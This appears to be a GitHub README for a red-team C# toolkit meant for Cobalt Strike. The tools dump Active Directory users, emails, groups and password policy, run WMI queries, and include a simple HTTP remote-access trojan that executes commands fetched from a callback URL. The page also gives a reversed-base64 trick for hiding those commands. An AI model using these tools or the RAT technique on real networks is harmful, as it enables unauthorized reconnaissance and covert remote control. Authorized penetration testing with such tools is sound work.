RedTeamCSharpScripts

C# Script used for Red Team. These binaries can be used by Cobalt Strike execute-assembly or as standalone executable.

LDAP utility

LDAP utility contains several LDAP query that will return all the valuable information you are looking for.

The utility support the following options

DumpAllUsers        Dump all the users 
DumpUser            Dump user information based on the samaccountname provided
DumpUsersEmail      Dump all users and email addresses
DumpAllComputers    Dump all computers
DumpComputer        Dump a computer information based on the name provided
DumpAllGroups       Dump all groups
DumpGroup           Dump a group information based on the name provided
DumpPasswordPolicy  Dump domain password policy

Usage: ldaputility.exe options domain [arguments]

ldaputility.exe DumpAllUsers RingZer0
ldaputility.exe DumpUser RingZer0 mr.un1k0d3r
ldaputility.exe DumpUsersEmail RingZer0
ldaputility.exe DumpAllComputers RingZer0 
ldaputility.exe DumpComputer RingZer0 DC01
ldaputility.exe DumpAllGroups RingZer0
ldaputility.exe DumpGroup RingZer0 "Domain Admins"
ldaputility.exe DumpPasswordPolicy RingZer0

WMI Utility

Set of predefined WMI query that can be used to query CIM classes.

The utility support the following options

Usage: WMIUtility.exe options [arguments]

ListProcess     Return a list of running process
ListService     List all the services
Query           Args (query, columns) wmiutility.exe Query "Select * From Win32_CommandLineAccess" "Name,Description"

enumerateuser.cs

List all the users samaccountname & mail

execute-assembly C:\enumerateuser.exe domain

ldapquery.cs

Perform custom ldap queries

execute-assembly C:\enumerateuser.exe ringzer0team "(&(objectCategory=User)(samaccountname=Mr.Un1k0d3r))" samaccountname,mail

Querying LDAP://ringzer0team
Querying: (&(objectCategory=User)(samaccountname=Mr.Un1k0d3r))
Extracting: samaccountname,mail
Mr.Un1k0d3r,[email protected],

simple-http-rat.cs

A simple RAT that execute command over HTTP. The code is calling back every 10 seconds and will execute the data present on the callback URL.

rat.exe callbackurl

The data is obfuscated using the following python trick

$ python -c 'import base64; print base64.b64encode("cmd.exe /c whoami")[::-1]'
=kWbh9Ga3ByYvASZ4VmLk12Y

Credit

Mr.Un1k0d3r RingZer0 Team

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

RedTeamCSharpScripts

LDAP utility

WMI Utility

enumerateuser.cs

ldapquery.cs

simple-http-rat.cs

Credit

About

Releases

Packages

Languages

Name		Name	Last commit message	Last commit date
Latest commit History 23 Commits
README.md		README.md
WMIUtility.exe		WMIUtility.exe
enumerateuser.cs		enumerateuser.cs
enumerateuser.exe		enumerateuser.exe
ldapquery.cs		ldapquery.cs
ldapquery.exe		ldapquery.exe
ldaputility.cs		ldaputility.cs
ldaputility.exe		ldaputility.exe
simple-http-rat.cs		simple-http-rat.cs
wmiutility.cs		wmiutility.cs

chosenonehacks/RedTeamCSharpScripts

Folders and files

Latest commit

History

Repository files navigation

RedTeamCSharpScripts

LDAP utility

WMI Utility

enumerateuser.cs

ldapquery.cs

simple-http-rat.cs

Credit

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages